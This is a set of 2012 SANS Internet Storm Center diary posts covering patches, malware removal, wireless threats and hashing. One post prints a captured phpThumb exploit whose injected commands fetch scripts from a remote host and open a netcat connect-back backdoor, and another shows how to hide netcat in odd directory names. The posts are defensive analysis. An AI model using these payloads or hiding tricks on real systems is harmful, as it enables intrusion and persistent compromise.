If you are aware of other software affected by this issue, please let us know through our comment section or via our contact form.

-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2012-04-14

Flashback Trojan Removal Tool Released

Earlier in the week Apple released a Java update which included software to remove the Flashback Trojan from OS X Lion machines running Java.

The Flashback Trojan removal tool is now also available for OS X Lion machines not running Java. This Flashback malware removal tool is available through the OS X Software Update tool, or from Apple's downloads site at http://www.apple.com/support/downloads/


-- Rick Wanner - rwanner at isc dot sans dot org - http://namedeplume.blogspot.com/ - Twitter:namedeplume (Protected)


Published: 2012-04-13

Anti-virus scanning exclusions

Reader Josh writes in with a good question: How does everyone deal with software whose vendor requires that the application and its install directories be excluded completely from Anti-Virus (AV) scanning ? Microsoft has some recommendations for AV exclusions of their own, as do the anti-virus companies themselves (example: McAfee), and googling a bit quickly shows that pretty much every software vendor has knowledge base articles that deal with making their particular tool invisible to AV.

- How do you keep track of the various "approved" exclusions across servers in your company ?
- How do you make sure no malware is hiding or setting up shop in those excluded portions ?
- Any other comments you might have ..

If you have a couple of minutes before starting your weekend, please share in the comments below!


Published: 2012-04-13

ISC Feature of the Week: Get to know the Handlers


All of the Internet Storm Center's active handlers are listed on https://isc.sans.edu/handler_list.html. Click a name to expand and see the handler's details. Click if you are Interested in How to become an Internet Storm Center Handler?


  • A picture of the handler will be on the left if available, otherwise a shadow avatar is shown.
  • If a handler has information posted on http://handlers.sans.edu/, there will be a link to their specific page. We are working towards migrating this site to the new layout and adding more features.
  • A list of the 5 most recent diaries written by the selected handler are listed and linked.
  • If the handler has a public Twitter handle, a direct link to their twitter.com page is listed.


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form.
Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu


Published: 2012-04-13

Oracle CPU Patches announced for Apr 17

Oracle have released their announcement for the April 2012 "Critical Patch Update", to be issued next Tuesday (Apr 17).

Several of the patch descriptions in the announcement are accompanied by the ominous words "may be exploited over a network without the need for a username and password". Sounds like next Tuesday will be busy for administrators of Oracle databases and middleware products.


Published: 2012-04-12

Apple Java Updates for Mac OS X

This Java security update removes the most common variants of the Flashback malware. "Java for OS X Lion 2012-003 delivers Java SE 6 version 1.6.0_31 and supersedes all previous versions of Java for OS X Lion." [1] Apple recommends that all Mac users install this update where Java is installed.

OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: The Java browser plugin and Java Web Start are deactivated if they remain unused for 35 days

For OS X Lion systems
Download file: JavaForOSX.dmg

Mac OS X v10.6.8, Mac OS X Server v10.6.8, OS X Lion v10.7.3, OS X Lion Server v10.7.3
Impact: A Flashback malware removal tool will be run

For Mac OS X v10.6 systems
Download file: JavaForMacOSX10.6.dmg

Java for OS X 2012-003 and Java for Mac OS X 10.6 Update 8 is available via the Software Update pane in System Preferences or via the Apple web site here.

[1] http://support.apple.com/kb/HT5242

[2] http://www.apple.com/support/downloads/


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-12

wicd Privilege Escalation 0day exploit for Backtrack 5 R2

A vulnerability was found in the current Backtrack 5 R2 version of the "Wicd" ( Wireless Interface Connection Daemon) software, where several design flaws have been found culminating in privilege escalation exploit. [1]

To address this vulnerability, Wicd 1.7.2 was released to patch this vulnerability (CVE-2012-2095) as well as several other fixes have been included in this update. The list of fixes is available here and the latest tarball can be downloaded here.

[1] http://www.infosecinstitute.com/courses/ethical_hacking_training.html
[2] https://launchpad.net/wicd/+announcement/9888
[3] https://bugs.launchpad.net/wicd/+bug/979221
[4] https://launchpad.net/wicd/1.7/1.7.2/+download/wicd-1.7.2.tar.gz


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-12

HP ProCurve 5400 zl Switch, Flash Cards Infected with Malware

HP ProCurve 5400 zl Switch, Flash Cards Infected with Malware

HP has released a security bulletin (CVE-2012-0133) indicating that a "[...] vulnerability has been identified with certain HP ProCurve 5400 zl switches containing compact flash cards which may be infected with a virus. Reuse of an infected compact flash card in a personal computer could result in a compromise of that system's integrity." [1]

A list of of HP 5400 zl series switch purchased after April 30, 2011 with their serial numbers as well as a resolution is posted here.

[1] http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c03249176


Guy Bruneau IPSS Inc. gbruneau at isc dot sans dot edu


Published: 2012-04-11

Challenge: What can you do with funky directory names?

Good day readers!   I've been playing around with creating unusual file names for a while.   (http://vimeo.com/9484706 , http://pauldotcom.com/2011/12/looking-for-stealth-ads-stream.html)   For example, did you know you can create a ".. "  (dot dot space) directory on Windows just like you can in Linux?   Want to try it?   Open up a command prompt and type this:

That's interesting.   Notice that our ".. " (dot dot space) directory is indistinguishable from the normal parent directory and is easily overlooked.   Attackers have been hiding in the "dot dot space" directory for a long time on the Linux platform.   Now try this from an administrative command prompt:

We created a ". "  (dot space) directory with a ".. " (dot dot space) subdirectory.  Then we put a copy of netcat in it.  (Your path to nc.exe may be different from this example).  As you see from the image above you can still execute netcat without any problems if you use a symbolic link.    Now try and browse to the c:\temp\  directory using the Windows Explorer GUI.   You will notice the SHORTCUT to NC.EXE in our c:\temp directory.    Double click on the ". " (dot space) directory.   You might expect that it take you into a directory containing our ".. " (dot dot space)  directory, but it doesn't!   Instead we are still in the c:\temp directory with our shortcut to nc.exe!   Double click the ". " (dot space) directory again.   This time we DO change to the directory containing ".. " (dot dot space).   Weird!    Now, Double click your ".. " (dot dot space) directory.   Where will that take you?  It takes you to the following error message:

Interesting.  Now try this.  Open your command prompt and change directories to the path "c:\temp\2628~1\45AA~1\" and do a directory listing.  This strange directory name has been consistent in my limited testing.  Is it the same for you?  There is your copy of nc.exe!   What the heck is that?

Your mission, should you choose to accept it, is to tell me what you can do with this.   What causes this behavior?  Post a comment!

HEY! I'm teaching SANS SEC560 BOOTCAMP Style in Augusta GA June 11th - 16th.   Sign up today!  http://www.sans.org/community/event/sec560-augusta-jun-2012



Published: 2012-04-10

SAMBA "root" credential remote code execution.

Samba - "a Windows SMB/CIFS fileserver for UNIX" seems to have a serious security vulnerability that samba versions 3.6.3 and all versions prior to it have a vulnerability that allows remote code execution as the "root" user from an anonymous connection.

Yep, time to upgrade SAMBA.


Hat tip: Charlie

Swa Frantzen -- Section 66


Published: 2012-04-10

Adobe April 2012 Black Tuesday Update

Adobe released its Black Tuesday bulletin too: apsb12-08.html announcing updates of Adobe Reader and Adobe Acrobat to versions 9.5.1 and 10.1.3.

They're fixing 4 vulnerabilities:

All allowing to random code execution.

This update also incorporates the recent changes to flash for the version "X" (10.1.3).

Swa Frantzen -- Section 66


Published: 2012-04-10

Microsoft April 2012 Black Tuesday Update - Overview

Overview of the April 2012 Microsoft patches and their status.

# Affected Contra Indications - KB Known Exploits Microsoft rating(**) ISC rating(*)
clients servers
MS12-023 Cumulative update for Internet Explorer adding fixes for 5 more random code execution vulnerabilities with the rights of the logged-on user.
Replaces MS12-010.

KB 2675157 No publicly known exploits. Severity:Critical
Critical important
MS12-024 An input validation vulnerability in the parsing of the signatures on executable files allows random code execution with the rights of the logged on user.
Replaces MS10-019.
Windows Authenticode

KB 2653956 No publicly known exploits. Severity:Critical
Critical Critical
MS12-025 An input validation failure in the .NET framework allows random code execution with the rights of the logged on user. This not only affects users browsing websites but also IIS servers running ASP.NET in e.g. a web hosting scenario.

KB 2671605 No publicly known exploits Severity:Critical
Critical Critical
MS12-026 Vulnerabilities in Forefront UAG (Unified Access Gateway) allow unfiltered access to internal resources and spoofing of the UAG webserver (directing the visitor to malicious sites instead of the UAG server, potentially compromising their login credentials).
Forefront UAG

KB 2663860
No publicly known exploits Severity:Important
NA Critical
MS12-027 A vulnerability in Windows Common Controls [ActiveX] allows random code execution with the rights of the logged-on user. Attack vectors include websites and email attachments. Also affects a whole lot of other Microsoft software such as SQL server, Commerce Server, Visual FoxPro, Visual Basic runtime aside of Microsoft Office.
Windows Common Controls

KB 2664258
Microsoft claims to be aware of "limited targeted attacks" using this. Severity:Critical
Critical Important
MS12-028 An input validation vulnerability in the .wps converter allows random code execution with the rights of the logged on user.
Replaces MS09-024 and MS10-105.
Office - works

KB 2639185
No publicly known exploits Severity:Important
Critical Important
We will update issues on this page for about a week or so as they evolve.
We appreciate updates
US based customers can call Microsoft for free patch related support on 1-866-PCSAFETY
(*): ISC rating
  • We use 4 levels:
    • PATCH NOW: Typically used where we see immediate danger of exploitation. Typical environments will want to deploy these patches ASAP. Workarounds are typically not accepted by users or are not possible. This rating is often used when typical deployments make it vulnerable and exploits are being used or easy to obtain or make.
    • Critical: Anything that needs little to become "interesting" for the dark side. Best approach is to test and deploy ASAP. Workarounds can give more time to test.
    • Important: Things where more testing and other measures can help.
    • Less Urgent: Typically we expect the impact if left unpatched to be not that big a deal in the short term. Do not forget them however.
  • The difference between the client and server rating is based on how you use the affected machine. We take into account the typical client and server deployment in the usage of the machine and the common measures people typically have in place already. Measures we presume are simple best practices for servers such as not using outlook, MSIE, word etc. to do traditional office or leisure work.
  • The rating is not a risk analysis as such. It is a rating of importance of the vulnerability and the perceived or even predicted threat for affected systems. The rating does not account for the number of affected systems there are. It is for an affected system in a typical worst-case role.
  • Only the organization itself is in a position to do a full risk analysis involving the presence (or lack of) affected systems, the actually implemented measures, the impact on their operation and the value of the assets involved.
  • All patches released by a vendor are important enough to have a close look if you use the affected systems. There is little incentive for vendors to publicize patches that do not have some form of risk to them.

(**): The exploitability rating we show is the worst of them all due to the too large number of ratings Microsoft assigns to some of the patches.

Swa Frantzen -- Section 66

NOTE: These security updates also included an update for Windows 8 Customer Preview.   Updates for Windows 8 are available through the operating systems Windows Update. (Thanks Rene! - Mark Baggett)


Published: 2012-04-10

Windows Vista RIP

Microsoft Windows Vista was your full name. Internally you identified yourself as windows 6.0. Most would call you simply Vista. You were never liked all that much. In part this was due to your security inspired nanny attitude. Despite that, you carried a lot of essential and long overdue security improvements. Improvement which allowed e.g. the practical removal of administrator rights without impacting the users of software written under the false presumption that users should have administrative rights.

The market has rejected you and killed you off. Your last copies went over the counter in October 2011 according to your maker. And finally, today that same maker buries you too: Microsoft is stopping support for Windows Vista today.

There is some hope that consumer rights groups will fight such a short lifespan of support and patches (e.g. in Europe there 's a mandatory 2 year warranty requirement for products sold to consumers), but overall and for all practical purposes, you're about to be forgotten by all but a handful who'll send significant donations to your maker.

So you will nonetheless live on for a while -for a maximum of 5 more years- through extended support as well as through your technically very closely related sibling Windows 7 (which identifies itself internally as windows 6.1 in a sort of tribute to you), and which was given a bit better of an education on how to interact with the public by the maker's marketing department.

Still those that have you will now have to decide to bury you in the trashcan or pay for extended support.


- Hat Tip: Rene
- I hope this doesn't offend any of our readers. it's only meant to be a bit sarcastic and to lighten up the rainy day a bit.

Swa Frantzen -- Section 66


Published: 2012-04-09

Not your Parent's Wireless Threat

Back in the good old days, wireless threats could be summarized in "security your 802.11x access point by picking a strong passphrase and do not connect to evil unknown access points". I am not sure if this was every quite right, but it certainly isn't right today. Cheaper hardware, in particular software defined radios with easily accessible open drivers make larger ranges of the spectrum available to intrusion and detection by non-nation state funded attackers. At the same time, wireless technologies are proliferating at an amazing pace. As much as possible, I am trying to write up a very brief summary of the various technologies. I am sure I forgot some. If so, please add via comments:

802.11: This set of standards deals with wireless LAN communication, and the most commonly known parts of it, a,b,g and n are probably the most common and easiest accessible wireless networking technologies. It uses frequencies in the 2.4 GHz and 5GHz band. (for all frequency mentions here: There tend to be local /national differences in what part of the spectrum is exactly used). At this point, speeds in excess of 100MBit/sec can be reached, and extensions are in the works to push this beyond 1 GBps. The range is typically in the "residential property" scale but can be extended over several km with special gear. Various optional encryption and authentication methods are available, but have to be configured. The cost to an attacker to sniff/attack 802.11 is probably in the $10 range.

Bluetooth: Meant to be a standard to replace pesky cables to connect devices like headsets to phones, the focus of this standard is low power and low cost. There is a simple but pretty effective encryption mechanism built in. However, it frequently is limited by the ability of the user to enter a complex PIN code using a one button headset. The range is typically shorter then 802.11 but can reach 10s of meters. Bluetooth uses the 2.4 GHz band. To effectively attack bluetooth, you need to be a bit more specific on what blue tooth dongle to use then with 802.11, which is why I rate the cost of attack at $50.

DECT: This standard is mostly used in cordless phones again operating in the unlicensed spectrum (900MHz, 2.4GHz, 5GHz). Range is similar to 802.11. Encryption is somewhat optional. Equipment to sniff DECT calls is not as readily available as only very specific cards can be used. Typically you need to import equipment, and you may be breacking some US import laws if you do so. However, the equipment still tends to be pretty cheap consumer grade PCMCIA cards. I will assign them a value / cost of $100.

Zigbee (802.15.4): Zigbee is a bit the new kid on the block, but it is growing quickly in the home automation and alarm system world. The "Killerbee" project is providing open source tools to attack and sniff zigbee. The hardware supported by kllerbee costs around $50. Range is very similar to bluetooth. 

RFID: RFID is very different from the technologies above as it is frequently used with "remote power". The RFID reader has to send out a sufficiently strong signal to power the RFID tag and to read the information embedded in it. There are a number of different sub-standards in how the information is exactly encoded. Readers are pretty cheap, also in the $50 range. If you want to create your own cards, you may need to pay a bit more (lets say $100?). RFID attacks can be dangerous if they are used to clone touchless door access keys. Some credit cards allow reading of the name and card number. Realistically, the range of RFID is a couple meters. Defense is pretty easy. You don't need a full faraday cage wallet. Just adding a credit card size piece of aluminum to your wallet will typically provide enough interference to make the tag not readable.

NFC: an extension to RFID which starts to show up in mobile phones. Just like RFID it is low power and limited to short distances. Attackers cost: $100

Cell phones: That may make a nice diary in itself in the future. I am just wrapping them all up in one for the quick discussion here (GSM, GPRS, EDGE, LTE...) .  Attacking these systems is technically and legally more difficult. It typically requires specific equipment and some expertise. But once set up, an attacker may setup a fake cell phone tower used to record or re-route phone calls. I would rate the cost of the attack in the $1000-$10,000 range (hard to tell with all the different standards. Some old analog standards can be "sniffed" with a decent radio scanner). There isn't much you can do to defend against this, other then using encrypted connections inside the cell phone channel.

 X10: A home automation wireless standard. Pretty much unencrypted. All you need is a transmitter set to the right "house code" (one out of sixteen). Cost: $50

Wireless mice/keyboards: These devices typically use more propriotery standards, but they have shown to be quite weak cryptographically and easy to attack. It does require a bit customized hardware is some cases. However, recently more and more of these devices use bluetooth (cost: $50-$100).

 other standards: z-wave (home automation, 900Mhz or 2.4GHz uses 128bit AES),  WiMax (wireless network technology in licenses spectrum for larger distances, aka "4G" by some carriers competing with LTE)

Many of these standards can be used to exfiltrate short range data. Or if they are used in alarm systems and door access controls, they can be used to assist in a physical attack. 


Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-08

Blog Log: More noise or a rich source of intelligence?

The Internet Storm Center has always advocated spending time monitoring and reviewing your logs, whether they are your personal systems or the ones at the office. Logs should be full of useful information so becoming accustomed to normal events helps quickly identify those outliers which can mean something worth looking at is going on. One of the key points to note; you, not the factory defaults, have to make the information in the logs actually useful.

When I first set up a blog, looking through what it logged, I found little of help or use to determine the threats my little spot on the internet faced. That was the default out of the box set up and millions of blogs are configured to effectively tell their owners little of no information on the bad stuff*.  A quick bit of searching pulled up a number of plugins to log details of all activities: IP address, action, user agent, etc. and neatly dropped them in to a database. As it’s using a well-known blog engine that’s had more that its fair share of troubles, it receives a healthy dose of attention from the automated denizens of the Internet.  With the plugins it’s reasonable easy to split up these net denizens between good autonotoms and downright bad. The good-ish connections are from search engine bots [2], all doing relatively benign index of the site; then we have evil flying monkey bots: spammers and automated attacks.

With the right information now being logged automated attacks are very easy to spot, especially the password guess attacks on default accounts. This immediately provides a list of known bad IP addresses being used with malicious intent. The SPAM entries have to be taken as bad IP addresses, even though many take SPAM to just an annoyance, these systems are clearly aren’t playing nicely and are most likely being directed to post messages without their owner’s consent.

These two lists of IP addresses can be added to one big block list on the site’s .htaccess file [3] or further broken down in to sub type and groups to further profile, if you’re that way inclined, as two examples of proactive actions.

Logs can be a rich source of data for many reasons, but only if configured, tweaked and then parsed. If you still don't think it's worth the time to read logs and pull valuable data out of them, read any of the technical details on the major breaches in the press. Password guessing, command injection and SQL injection attacks are incredibly easy to spot - if the right data is logged and you're looking for it.

[1] Example of what can be logged http://httpd.apache.org/docs/2.0/mod/mod_log_config.html
[2] Example of some of the more common search bots strings http://user-agent-string.info/list-of-ua/bots
[3] http://www.htaccess-guide.com/

*Now if you have permissions to the access log – the log which shows details [1] on every connection to your site - that’s a different story, but that’s normally up to the hosting provider if they allow it.


Chris Mohan --- Internet Storm Center Handler on Duty


Published: 2012-04-07

Phising and client side attacks, the future?

I've been involved in a few penetration tests recently and one thing that seems to be happening is that privileged access is harder to come by.  It used to be start at 9 have admin by 9.30 (on a slow day). Today it certainly tends to be a lot more work. 

I put it down to improvements in security over the last few years in many organisations as well as improvements in operating systems. Love it or hate it Windows 7 does a pretty good job of securing the machine. Combined with some practices like no local user admins, automatic patching and a decent HIPS it can be quite a challenge to compromise a fully patched and well managed Windows box.  OSX similarly has made some steps towards improving the security of the OS (If only they turned the firewall on by default :-(  ).  So if the operating system is pretty good and likely to get better, the attack vectors have to shift.  Which is where client side attacks enter the picture.  Get the user to attack their system for you.

We have had some good examples of this in the past year where sites were reportedly compromised because someone clicked something they should not have, likely delivered via email.  Just like the wooden horse the gift was accepted (phising email) and the trojan has the nasty surprise.

So on this, for many of you long weekend, I'd like you to have a little think and maybe complete the poll on the page or enter comments here. Phising/social engineering emails and client side attacks, something we are going to see a lot more of in the future or a passing fad?

Have a nice Easter for those that celebrate it.  Have a great weekend for those that do not. 




Published: 2012-04-06

Another OS X Java Patch

Only a couple days after releasing the critically late Java patch (2012-001), Apple released another Java update. At this point, Apple's site doesn't mention what this new patch fixes, or why it was released. But eventually, you may see details at http://support.apple.com/kb/HT1222 . Too bad that Apple isn't getting its security house in order. It appears that OS X has reached a level of market penetration that would require a company with a meaningful security response capability behind it.

Just a couple of additional pointers for OS X security:

- Sophos is making a free Antivirus product for OS X. I am running it for a few months now without bad side effects. http://www.sophos.com/en-us/products/free-tools/sophos-antivirus-for-mac-home-edition.aspx

- You can try and enable "Gatekeeper" on OS X Lion. This feature will prevent unsigned software from running. This feature will be fully integrated once the next version of OS X (Mountain Lion, OS X 10.8) arrives, but has been included in OS 10.7.3 . To activate it, you need to run: sudo spctl --enable . Expect it to complain about a lot of "normal" software as most OS X software right now is not yet signed. (but you can always allow it to still run). 

Otherwise: Keep good backups... 

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-06

Social Share Privacy

For quite a while now, we used the "Add This" toolbar to allow readers to quickly share articles with various social networks. As a security site, we talk a lot about the risks of social networks, but we can't ignore them. Our mission is to get the word out about current security issues. Social media are becoming an important tool to assist us with that.

At the same time, we are very aware of the privacy issues. Lucky for us, the german technology website Heise Online came up with a great solution. The "Social Sharing Privacy" toolbar we are using as of today will not leak any data about you to social networks or companies like "Add This" until you explicitly turn on the toolbar. If you would like to share a story via Twitter/Facebook/Google , you will first need to turn on the toolbar (which will load the actual images from the respective sites) and then you are able to "share".

I hope this will not prevent too many of you from sharing our stories to your social media accounts. We will still tweak the toolbar a bit. Please let us know if you see issues with specific browsers (we are usually testing with Safari on OS X, Firefox on Linux and sometimes even with IE on Windows).

Plugins for popular tools like Wordpress are available.

Social sharing privacy source code: http://www.heise.de/extras/socialshareprivacy/
This blog post helped me quite a bit: http://benjamin-steininger.de/2011/12/07/extending-heise-socialshareprivacy-to-pass-a-dynamic-title-to-twitter/



Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-05

Evil hides everywhere: Web Application Exploits in Headers

This topic has come up before, but it is probably worthwhile noting that of course, any data provided by the user can be used against a web application, not just proper "POST" and "GET" data. For example, we had a couple readers point us to a recent blog post in http headers [1] and how many web application vulnerability scanners miss them.

Another reader (Thanks Ovi!) sent us an interesting example "hiding" the exploit in the browser's user agent field. The exploit is directed at the infamous "phpThumb" tool, and again, isn't new (see for example the post by Spiderlabs [2]). The vulnerability was discovered originally in 2010 and assigned CVE-2010-1598.  The bug wasn't fixed until about a year ago when version 1.7.10 of phpThumb was released [3].

Let's take a quick look at the "mechanics" of this exploit and the vulnerability. First of all, the exploit's User Agent: (I formatted it for readability, but the "pel" command, which IMHO is a typo, came from the original.

<!--?system('cd /var/tmp;
                wget http://xyz.244.68.88/cb.jpg;
                perl cb.jpg xyz.103.68.73 8004;
                wget http://xyz.244.68.88/cback;
                pel cback;
                cd /dev/shm;
                curl -O http://xyz.244.68.88/cb.jpg;
                perl cb.jpg xyz.103.68.73 8004;
                netcat xyz.103.68.73 8004;
                curl -O http://xyz.244.68.88/cback;
                perl cback;nc xx.103.68.73 8004');
?-->[... second attempt in same user agent omitted ...] 
Googlebot/2.1 (+http://www.google.com/bot.html)


 In essence, the script appears to install some for of backdoor. The original servers the exploit connected to is no longer accepting requests, so we couldn't test it. The script uses wget as well as curl to download the file in case one of these scripts is not installed.

Now here comes the interesting part: The "User Agent" is actually not used by phpThumb. Instead, the actual exploit happens in the POST data (which is why you are still seeing the POST method used. However, the POST data is somewhat validated, not allowing it to contain the full exploit script. Instead, the function executed by the "POST" method will then refer to the HTTP_USER_AGENT environment variable, and pull its content and execute it. Some of the other discussions of this bug are missing this important aspects of this exploit.

Here is a quick outline of the code, and what went wrong:

First of all, the "fltr" parameter is parsed. Multiple filters may be provided, but for the purpose of this exploit, one is all it takes. Each filter contains a command, and a parameter. They are delimited by a pipe ("|").

@list($command, $parameter) = explode('|', $filtercommand, 2);

Later, the command line is assembled, without any additional checks on the parameter. For example:

$commandline .= ' -modulate 100,'.(100 - $parameter).',100';

Finally, the command line is executed:

$IMresult = phpthumb_functions::SafeExec($commandline);

Dont' get your hopes up based on the name of the function ("SafeExec"). Its main purpose is to figure out which one of the various ways of code execution are allowed.

The only hurdle the attacker has to overcome is to create an exploit that will first run the ImageMagick command successfully, then append the malicious command with a semicolon. The semicolon is never filtered. Many of these exploits don't even bother with the additional user agent obfuscation. The "googlebot" part of the header is likely only included to sneak past weak web application firewall configurations that may ignore traffic from Google (the IP address this exploit came from is not associated with Google).

[1] http://resources.infosecinstitute.com/sql-injection-http-headers/
[2] http://blog.spiderlabs.com/2011/12/honeypot-alert-user-agent-field-arbitrary-php-code-execution.html
[3] http://phpthumb.sourceforge.net/demo/docs/phpthumb.changelog.txt

Johannes B. Ullrich, Ph.D.
SANS Technology Institute


Published: 2012-04-04

ISC Feature of the Week: Diary/Infocon/Event Notifications


We briefly noted this topic in https://isc.sans.edu/diary/ISC+Feature+of+the+Week+XML+Feeds/12595. If you are already signed up, you saw the recent infocon change to Yellow delivered directly to you! If you aren't signed up and don't want to miss the next one or any of our diaries published, read on! You can setup notifications at https://isc.sans.edu/notify.html.


Overview - https://isc.sans.edu/overview

  • A typical notification will include all content as part of the subject, and a link to the relevant content in the body.
  • Selection from drop-down will include infocon change notification by default.
  • To change your subscription option, just sign up again and the new signup will replace the old one.

Subscribe - https://isc.sans.edu/notify.html#subscribe

  • To get started, fill in the form and click Subscribe to receive a validation email.
  • Notification types are defined below.
  • Your email can be any email or your cellular phone email assignment. Contact your provider if you need more information on this. If you are logged in to ISC, your email will be entered for you.
  • Approximate time of day is for daily summary email. Adjust UTC time for your timezone.

Unsubscribe - https://isc.sans.edu/notify.html#unsubscribe

  • Simply enter your email in the box and click Unsubscribe. If you are logged in to ISC, it will be entered for you. You will see the option to unsubscribe in every notification email.

Notification Details - https://isc.sans.edu/notify.html#notification_details

  • New version of a story is published: A handler may mark an update to a story as a new version if it contains a significant addition or correction (more then a spelling correction).
  • New Story is published: Typically, at least one story is published each day.
  • Once a day headlines: We will send you a list of new stories published the last 24 hrs.
  • Infocon Change: You will receive an email whenever the infocon changes. This happens a couple times a year. You will also receive these e-mails if you sign up for any of the other options. The "Important Story" option has been moved into this category.

Sample E-Mail

  • The Subject will always start with [ISC] followed by title such as MacOS X Java Patches.
  • an X-Header: sans-isc-diary is added.
  • The notification email will be from bounces@isc.sans.org.
  • The body will contain a link to the story or stories http://isc.sans.org/diary.html?storyid=672
  • An unsubscribe link is included in every notification http://isc.sans.edu/notify.html#unsubscribe


Post suggestions or comments in the section below or send us any questions or comments in the contact form on https://isc.sans.edu/contact.html#contact-form

Adam Swanger, Web Developer (GWEB, GWAPT)
Internet Storm Center https://isc.sans.edu



Published: 2012-04-03

MacOS Users vulnerable to Blackhole exploit kit

If you own a MacOS computer, you might want to disable java for a while until Oracle develops a patch to solve CVE-2012-0507 vulnerability, because there is a Blackhole Exploit Kit version in the wild exploiting this vulnerability and it also can be exploited using metasploit.

If you want to disable java plugins in your MacOS computer, Marcus J. Carey created a video showing how to do it.

More information about this issue at https://www.f-secure.com/weblog/archives/00002341.html

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
e-mail:msantand at isc dot sans dot org


Published: 2012-04-03

Another airline scam! This time from US Airways

Be careful with the links showed in this diary because they might still be live and could infect your computer if not handled properly

More and more scams are seen each day. I discussed in a previous diary a phishing attack sent to users so attackers can own their computers. I will show you today another attack using the same technique and the same malicious code.

I received today the following message:

US Airways SCAM

The online reservation details link pointed to the link http://somostigreros.com.ve/s3JgEpEu/index.html. The document has a javacript pointing to four different URL:

Javascript from infected page

The javascript downloaded is the same in all the four cases and points to another link:

Link to malicious code

We arrive to an obfuscated javascript. Let's see a snip of it:

Obfuscated Javascript

After decoding the script, I got the same javascript analyzed in my previous diary, which performs the following:

  • Identification of the navigator being run.
  • Identification of Adobe Flash and Adobe Reader version.
  • Shellcode execution to download malware but this time it is downloaded from
  • Malware is the same DLL discussed in my previous diary, but at this time virustotal shows 30/42 detection ratio. Mcafee detects it as Generic.bfr!em, Symantec detects it as Suspicious.Cloud and TrendMicro detects it as TROJ_SPNR.11C912.

Additional to the measures previously discussed to mitigated this kind of threats, You can be a propagation vector for malware like the one being shown if you publish to the internet vulnerable servers. Many attackers no longer want to shutdown your server but to publish malware in not-visible locations inside your webserver or web application. Please keep in mind the following:

  • Install all available patches  to your operating system and base software. If you cannot do this because your application will stop working, you definitely need to put in place additional controls like Host Intrusion Prevention System (HIDS) and Network Intrusion Prevention System (NIPS) .
  • Test your web applications for vulnerabilities before publishing them on the Internet. If you don't do this, the attackers will be happy to do it for you.
  • If you are unsure if your web server or web application have vulnerabilities, use a Web Application Firewall (WAF). I have found useful ModSecurity to place that kind of protection.

Have you received this kind of threat inside your network? Let us know using our contact form.

Manuel Humberto Santander Peláez
SANS Internet Storm Center - Handler
Twitter: @manuelsantander
e-mail:msantand at isc dot sans dot org


Published: 2012-04-02

SHA 1-2-3

NIST is currently in the final stages of defining a new "secure hashing algorithm" (SHA) [1]. The goal of the competition is to find a replacement for the current standard ("SHA-2", aka SHA-256 and SHA-512). NIST attempts to be somewhat proactive in defining crypto standards, realizing that new standards need to be implemented well before the old once are considered broken.

The three popular hash functions, MD5, SHA1 and SHA2, all use variations of a particular hashing algorithm known as "Merkle-Damgård Construction". Attacks have been developed for MD5 and SHA1, and it is plausible that they will be extended to SHA2 in the future. As a result, the candidates for SHA-3 use different algorithms that are hopefully safe from similar attacks.

A good cryptographic hash will make it hard to come up with two different documents that exhibit the same hash. There are a number of variations of this attack. For example, weather or not one of the documents (or hashes) is provided. One attack in particular affects the Merkle-Damgård based hashes, the "length extension attack". This attack is in particular relevant if a hash is used to verify the integrity of a document.

In this attack, the hash is created by concatenating a secret and a file, then hashing it. The hash and the file (without the secret) at then transmitted to a recipient. The recipient uses the same secret to recreate the hash and to verify if the file is authentic. However, for ciphers susceptible to the length extension attack, an attacker may calculate a new hash, if the attacker knows the size of the original hashed document. However, the attacker can only add to the document.

To make this more specific, lets say I am sending you a contract. We agreed on a pre-shared secret. I am creating the hash of "secret+contract" and send the hash to you with the document. An attacker now intercepts the message, and adds a page to the contract, and calculates a new hash. All the attacker needs to know (guess?) is the length of the secret.

Current hashing functions can be used safely to authenticate messages, but the algorithm has to be slightly more complex. Instead of just appending the key, an HMAC algorithm has to be used, which essentially applies the key to the message by XOR'ing the message with the key before hashing (just use HMAC.. its a bit more complex then that and has to be done right)

But back to SHA-3: NIST has narrowed the field of potential candidates down to 5. All of them are safe with respect to the length-extension attack. However, they all take up more CPU cycles then SHA-2, unless in some cases where HMAC is required. In addition, at a recent IETF conference, it was pointed out that during the competition, SHA-2 turned out to be more robust then expected, reducing the need for SHA-3 to replace SHA-2.

So why should you care? There are a number of reasons why you should be concerned about encryption standards. First of all, many compliance regiments require the use of specific hashing and encryption algorithms. Secondly, while there may be equivalently strong algorithms, usually developers of libraries spent more effort in optimizing standard algorithms, and you may even find them "in silicon" in modern CPUs. I wouldn't be surprised to find a "SHA-3" opcode in a future main stream CPU. At this point, SHA-256 or SHA-512 should be used if you are developing new software. However, if you find SHA-1, you shouldn't panic. Make sure you are using HMAC properly, and are not just concatenating secrets with documents in order to validate them.

[1] http://csrc.nist.gov/groups/ST/hash/sha-3/index.html
[2] http://www.ietf.org/proceedings/83/slides/slides-83-saag-0.ppt

Johannes B. Ullrich, Ph.D.
SANS Technology Institute